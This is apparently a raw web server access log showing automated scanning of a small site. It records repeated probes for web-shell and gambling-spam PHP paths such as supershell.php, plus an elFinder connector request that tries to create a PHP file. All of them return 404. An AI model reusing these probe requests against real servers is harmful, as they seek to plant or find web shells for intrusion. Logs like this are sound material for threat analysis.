157.20.32.210 - - [18/Oct/2025:10:06:55 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:07:00 -0400] "GET /toto.php HTTP/1.1" 404 10896 "http://salhab360photos.com/toto.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:02 -0400] "GET /kaskus.php HTTP/1.1" 404 10897 "http://salhab360photos.com/kaskus.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:07:02 -0400] "GET /products60924114?kg=0060181220 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:07:08 -0400] "GET /slottoto.php HTTP/1.1" 404 10905 "http://salhab360photos.com/slottoto.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:10 -0400] "GET /slot88.php HTTP/1.1" 404 10903 "http://salhab360photos.com/slot88.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:14 -0400] "GET /daftarslot.php HTTP/1.1" 404 10902 "http://salhab360photos.com/daftarslot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:22 -0400] "GET /webslot.php HTTP/1.1" 404 10905 "http://salhab360photos.com/webslot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:25 -0400] "GET /webjudi.php HTTP/1.1" 404 10903 "http://salhab360photos.com/webjudi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:27 -0400] "GET /slotjudi.php HTTP/1.1" 404 10905 "http://salhab360photos.com/slotjudi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:35 -0400] "GET /slotmurah.php HTTP/1.1" 404 10906 "http://salhab360photos.com/slotmurah.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:07:38 -0400] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=34EYb9dshEnsm1VfhBnX7Djt8Tp.php:aaa HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
51.79.229.86 - - [18/Oct/2025:10:07:40 -0400] "GET /slotgacor2022.php HTTP/1.1" 404 10906 "http://salhab360photos.com/slotgacor2022.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:53 -0400] "GET /supershell.php HTTP/1.1" 404 10924 "http://salhab360photos.com/supershell.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:02 -0400] "GET /point.php HTTP/1.1" 404 10905 "http://salhab360photos.com/point.php" "Go-http-client/2.0"
